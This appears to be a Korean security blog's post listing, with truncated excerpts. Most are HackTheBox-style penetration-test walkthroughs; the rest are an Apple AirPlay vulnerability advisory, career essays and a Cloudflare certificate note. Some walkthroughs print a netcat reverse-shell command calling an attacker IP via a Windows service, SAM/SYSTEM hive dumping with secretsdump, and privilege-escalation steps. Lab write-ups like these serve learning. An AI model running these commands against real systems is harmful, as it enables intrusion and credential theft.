[🚨위험내용]- Apple AirPlay의 "공중 전파" 제로클릭 RCE 공격으로 23억 5천만 대 이상의 기기가 Wi-Fi 기반 원격 하이재킹에 노출되었습니다. Mac, iPhone, CarPlay, 스피커, TV 등 공유 네트워크에서 모두 취약합니다.- 웜 공격 가능. 악용 가능. - CVE-2025-24252- 같은 네트워크에 있고 에어플레이 업데이트가 되어있지 않다면 당신 디바이스는 취약점에 노출 되어 있습니다. [🔓대응방안]- 패치(iOS/macOS 18.4 이상).- AirPlay 끄기 [맥북해킹]https://www.youtube.com/watch?v=ZmOvRLBL3Ys [스피커해킹]https://www.youtube.com/watch?v=vcs5G4JWab8 [자동차해킹]https..

웹사이트에서 Setting 부분에 저장을 누르면 Server Address 데이터만 전송되는 것을 확인nc로 포트 리스닝하고 공격자의 IP로 대체시 비밀번호 포함한 데이터 노출 확인 후 접속 [계정의 그룹 및 권한 확인][SeBackupPrivilege]SAM 및 SYSTEM 획득하여 Administrator Hash 접속 시도 하였으나 불가[그룹속성확인]Print Operators 또는 Server Operators 그룹에 속해있어서 서비스 등록 시도리버스 쉘 업로드 및 서비스 등록 및 실행# 리버스쉘 서비스명 VSS를 생성sc.exe config VSS binpath="C:\Users\svc-printer\Documents\nc.exe -e cmd 10.10.14.29 1234"[NT AUTHORIT..

[이해하기]impacket-secretdump - 로컬환경[SAM] 로컬 사용자 계정, SID, 패스워드 해시 저장C:\Windows\System32\config\SAM[SYSTEM] - SAM의 암호화를 해제하는데 필요한 SYSKEY 존재C:\Windows\System32\config\SYSTEMSAM + SYSTEM 조합하여 해시 추출# SAM 및 SYSTEM 파일 추출> reg save hklm\sam sam> reg save hklm\system system# evil-winrm 다운로드 명령어 실행> download sam> download system# 로컬환경에서 sam 파일 및 system 파일을 조합하여 해시추출impacket-secretsdump -sam sam -system syste..

리눅스 머신으로 웹서버가 있으며, 해당 서비스에는 Exploit 취약점이 있는 솔루션이 존재한다. 접속하게 되면 호스트네임으로 보아 container 환경으로 확인할 수 있다. 서비스의 데이터베이스를 공격자 호스트로 빼내어 해시 크래킹을 통하여 식별된 계정정보를 가지고 실제 호스트에 접속 시도를 하게된다.해당 호스트에는 크로미니움 브라우저는 원격으로 디버깅할 수 있도록 구성이 되어 있으며 해당 서비스 확인 시 주기적으로 특정 사이트에 로그인 하는 것을 자동화 하였다.서비스에 접속하게되면 명령어를 실행할 수 있는 기능이 있으며 chmod setuid를 통하여 권한 상승을 할 수 있다. [전제조건]- 획득한 데이터베이스의 데이터가 실제 SSH 접속정보와 일치해야 한다.- 특정 서비스에서 Exploit이 존재..

[개념]AD(Active Directory) 환경에서의 침투 박스인 Administrator에 대해서 학습을 진행 했다.Active Directory는 조직 내 사용자, 컴퓨터, 그룹 등의 리소스를 중앙에서 통합 관리하고, 인증(Authentication)과 인가(Authorization)를 처리하는 시스템이다. 이러한 인증 과정은 Domain Controller(DC) 라는 서버가 담당하며, 사용자가 네트워크 리소스에 접근할 때 DC가 계정 정보를 확인하고 인증 여부를 결정한다.해당 박스에서는 도메인 컨트롤러 호스트 안에 존재하는 정보을 이용하여 BloodHound를 학습하는데 중점이 있다. 보통 침투는 서비스나 프로그램을 이용해서 침투를 하는 것과 흐름이 다르다. [결론]하나의 계정을 시작으로 다른 ..

보통 회사의 구인공고를 보게되면 마주하는 내용은 다음과 구성된다고 생각한다. 상세한 직무 내용 기재#기존 인력의 퇴사- 기존 KPI 등과 같은 직무 명세서를 따라 재 개시#신규 팀빌딩- 다수의 면접을 통한 포지션의 세분화 또는 기존 배경지식을 활용한 업무 공고 포괄적 직무 내용 기재#해당 포지션의 첫 신규 채용- 기존 인력들이 해당 포지션에 대한 이해 부족으로 상세한 직무 내용 기재 전 각 회사의 조직마다 다르겠지만 원하는 인재가 다르다. 특정 분야에서 일을 커버해줄 인원 또는 여러 범위를 커버해줄 인재를 찾는다고 보고있다. 물론 면접관의 수준에 따라 면접자의 수준이 결정 될 수 있다고 생각한다. 사람을 테스트하고 애초애 마음에 들지 않는다고 대놓고 티를 내는 면접관의 경우 예외로 하겠다. 개인적 경험으..

학창 시절, 정보보안 분야를 꿈꿨던 사람들은 대부분 해킹이나 게임 핵과 같은 주제에서 흥미를 느끼며 관심을 가지기 시작했을 것이다. 정보보안 중에서도 특히 해킹 분야는 오펜시브 시큐리티, 즉 레드팀의 역할과 밀접하다.하지만 대한민국에서의 정보보안은 법과 제도 안에서 유지되는 직업군으로, 블루팀의 역할이 대다수다. 긍정적으로 보면 제도적으로 보장된 안정성이 있는 분야다. 주로 성장 중인 스타트업이나 중견기업, 대기업을 대상으로 취업 기회가 열려 있다. 레드팀의 역할을 기대하고 입사를 하였지만 주요정보통신 기반시설이나 ISO27001 및 ISMS(P)의 인증요건을 갖추기 위한 행위로서의 업무의 방향성이 정해지는 것이 대부분이다. 순수히 기업의 보안실태점검을 하는 시장이 상대적으로 적은 이유이다. 그러나 극히..

CloudFlare -> 프록시 서버 -> 서비스문제점일반사용자는 CloudFlare를 통해서 프록시 서버의 도움을 받아 서비스에 접근한다.해당 서비스에서는 자체적으로 사용중인 SSL인증서가 존재한다.CloudFlare는 프록시서버를 통하여 서비스에 접근하기에 자체적 서명된 인증서는 신뢰를 할 수 없다.그렇기에 프록시 서버 자체에서 해당 서비스의 인증서에 대한 신뢰성을 적용하여 CloudFlare에게 응답해야한다.즉, 신뢰관계 부족으로 인한 현상  cloudflared가 Harbor 서버의 인증서를 신뢰하지 않기 때문입니다. 이런 상황이 발생하는 이유는:자체 서명된 인증서: Harbor는 일반적으로 설치 과정에서 자체 서명된 인증서를 생성합니다. 이런 인증서는 공인된 인증 기관(CA)에서 서명하지 않았기..

1. smnp v1 string 메시지에서 서비스 정보 확인2. 서비스의 로그인 페이지 확인 후 기본 계정 입력3. 저장된 계정의 해시정보 확인4. SSH 정보와 같다는 가정하에 로그인5. 계정의 sudo 권한 확인6. mosh-server 관련 Privileges Escalation 이용

1. 정보수집2. 웹서비스 파일 다운로드 취약점 확인 및 /etc/passwd 다운로드3. 웹서비스 서브도메인 정보수집 및 Gitea 서비스 데이터베이스 다운로드4. DB user 테이블 계정 비밀번호 크랙 및 SSH 접속 시도5. 스크립트 구문에서 magick 관리자 권한으로 실행 확인 및 취약점 이용 1. 외부정보수집nmap 후 80포트에서 웹서비스가 동작함을 확인했다.2.서비스정보수집서비스의 취약점 정보를 수집하였으나 확인된 사항은 없다(apache 2.4.52) 3.웹서비스정보수집웹 서비스의 기능을 확인하여 서버로 침투 포인트를 탐색한다. 해당 사이트는 웹사이트에서 예약할 수 있는 기능을 제공한다. [예약기능]동작확인1. 정보 기입 후 Submit을 누르면 POST로 정보를 서버에서 보낸다.2...